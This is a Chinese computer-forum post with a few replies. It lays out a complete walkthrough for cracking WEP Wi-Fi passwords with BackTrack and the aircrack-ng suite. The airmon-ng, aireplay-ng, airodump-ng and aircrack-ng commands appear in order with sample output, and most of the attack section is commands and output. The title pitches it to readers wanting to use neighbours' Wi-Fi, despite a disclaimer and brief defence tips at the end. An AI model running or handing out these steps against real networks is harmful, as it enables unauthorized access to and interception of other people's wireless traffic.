电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 3898 人浏览分享

破解WLAN密码(摘自电脑报)送给不会蹭网的童鞋

  [复制链接]
3898 5
首先声明,嗅探公开频道的信息不违法,对嗅探得信息进行运算也不违法,但是未经同意使用他人WLAN是违法的。对擅自使用本文造成的一切后果,本人不承担一切责任!
不要再说什么邻居没有WEP之类的。本文是以科普目的写的。不是教唆犯罪。

WLAN的加密方式,在非专业级别有三种,1)明文,也就是不加密,2)WEP,和3)WPA/WPA2。如果周围有人还用明文WLAN,那就省事儿了,不用费心破解了。如果周围所有人都在用WPA/WPA2,也省事儿了,破解也破解不了。目前还没有有效破解WPA/WPA2的方法。如果有人用WEP的话,请继续看下去。

准备工具
1.一台带无线网卡的电脑。推荐轻薄笔记本,因为你有可能需要在房子里面走来走去以找信号好的地方。网卡的型号也是有要求的。虽然通过查询型号也能确定是否支持,还是用后面的测试工具方便。
2.一张BackTrack的LiveCD或LiveUSB。下载地址是http://www.backtrack-linux.org/downloads/。制作LiveUSB的教程:http://www.backtrack-linux.org/tutorials/usb-live-install/
3.最好自己搭建一个无线热点来进行训练。注意,本文需要一个有流量的无线网。如果自己搭建无线网,用一台无线上网的电脑连入这个无线网。每隔一会儿开一个网页,或者挂着qq都行。假定热点的设置如下:
MAC地址:00:11:22:33:44:55
SSID:tbc
频道:9
复制代码
破解过程
首先,用BackTrack开机。开机以后,可以选择使用startx命令打开GUI,或者使用CTRL+ALT+Fx在不同shell下切换。
以下是步骤的简介
1.打开无线网卡的监听模式
2.测试无线网卡能否插入数据
3.进行fake authentication,让AP接受你发的包
4.打开嗅探工具
5.发送ARP包让数据获得更快
6.利用破解工具算出密码
复制代码
第一步、打开无线网卡的监听模式
这一步的目的是让无线网卡接收听到的所有数据包。通常情况下,无线网卡只向系统汇报发给你的数据包,而忽略发给别人的数据包。
先将无线网卡关闭:
airmon-ng stop wlan0
复制代码
系统回复:
Interface       Chipset         Driver

wlan0           Atheros         madwifi-ng (Stopped)
复制代码
然后在第9频道打开监听模式:
airmon-ng start wlan0 9
复制代码
系统回复:
Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
mon0            Atheros         madwifi-ng (monitor mode enabled)
复制代码
第二步、测试无线网卡能否插入数据
这一步有两个目的。第一是测试无线网卡是不是被破解软件支持。还有就是测试你的无线网卡发送的数据是否能被被攻击的热点接收到。
运行:
aireplay-ng -9 -e tbc -a 00:11:22:33:44:55  wlan0
复制代码
系统回复:
09:23:35  Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 9
09:23:35  Trying broadcast probe requests...
09:23:35  Injection is working!
09:23:37  Found 1 AP

09:23:37  Trying directed probe requests...
09:23:37  00:11:22:33:44:55 - channel: 9 - 'tbc'
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39  30/30: 100%
复制代码
如果第三行没有出现,那么证明你的无线网卡不被破解软件支持。唯一解决办法是更换。如果出现了第三行而最后一行出现非常低的百分比。那么有可能是因为你电脑距离热点太远,换个位置或者换一个无线网。

第三步、打开嗅探工具
在一个独立的命令行里运行:
airodump-ng -c 9 --bssid 00:11:22:33:44:55 -w output wlan0
复制代码
如果运行成功,会出现类似下面的输出,里面的#Data是我们得到了多少数据的意思:
CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25
                                                                                                              
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                            
00:11:22:33:44:55   42 100     5240   178307  338   9  54  WEP  WEP         tbc                           
                                                                                                            
BSSID              STATION            PWR  Lost  Packets  Probes                                             
                                                                                                            
00:11:22:33:44:55  00:0C:C5:33:CA:27   42     0   183782  
复制代码
第四步、进行fake authentication,让AP接受你发的包
这一步的目的是跟热点进行一次简单握手。这样热点就会接受你发出来的数据包。
运行:
aireplay-ng -1 0 -e tbc -a 00:11:22:33:44:55 wlan0
复制代码
握手成功会得到以下回复:
18:18:20  Sending Authentication Request
18:18:20  Authentication successful
18:18:20  Sending Association Request
18:18:20  Association successful :-)
复制代码
第五步、发送ARP包让数据获得更快
这一步的目的是让无线网发送更多我们关心的数据,以加速破解过程。
运行:
aireplay-ng -3 -b 00:11:22:33:44:55 wlan0
复制代码
刚开始会不动几秒,过一会儿会变成类似下面的输出:
Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...
复制代码
第六步、利用破解工具算出密码
当我们得到了足够的数据以后,就可以进行破解了。多少数据算是足够数据呢?以我的经验,#Data数字达到三万就可以了。如果计算不成功,可以多等一会儿,等数量再涨一涨再算。
运行:
aircrack-ng -b 00:11:22:33:44:55 output*.cap
复制代码
如果成功破解,会出现类似下面的回复:
                                              Aircrack-ng 0.9


                              [00:03:06] Tested 674449 keys (got 96610 IVs)

KB    depth   byte(vote)
  0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0)
  1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12)
  2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10)
  3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15)

                       KEY FOUND! [ 12:34:56:78:90 ]
      Probability: 100%
复制代码
P.S.怎么扫描周围的无线网呢?可以使用另外一款BackTrack自带的软件kismet。在命令行里面输入kismet。这个软件可以告诉你周围每一个无线网的SSID,MAC,频道,加密方式,信号强度等。
P.P.S.讲了这么多怎么破解,然后怎么防呢?防范有多种方法,要综合使用,1)最重要的是使用WPA/WPA2,并且使用一个复杂的密码。其他的只能让破解绕个弯儿,不能从本质解决问题,2)隐藏SSID,3)只允许指定MAC连接。

评论 5

www5581056 www5581056  合格会员  发表于 2011-10-18 23:43:29 | 显示全部楼层
虽然这么做不好,但还是支持了

kcl602 kcl602  正式会员  发表于 2011-10-19 13:31:59 | 显示全部楼层
{:3_236:}楼主给的制作LiveUSB的教程是英文啊...

cyqrjy cyqrjy  初级会员  发表于 2012-2-6 21:26:34 | 显示全部楼层
我周围的都是WPA的,原来省事了。学习学习。

fmy222 fmy222  正式会员  发表于 2012-5-17 07:29:39 | 显示全部楼层
看看太复杂了,学习下也好,支持了

www5581056 www5581056  合格会员  发表于 2012-5-17 10:30:54 | 显示全部楼层
不知道是否管用,先看看吧

您需要登录后才可以回帖 登录 | 注册

本版积分规则

0

关注

0

粉丝

33

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.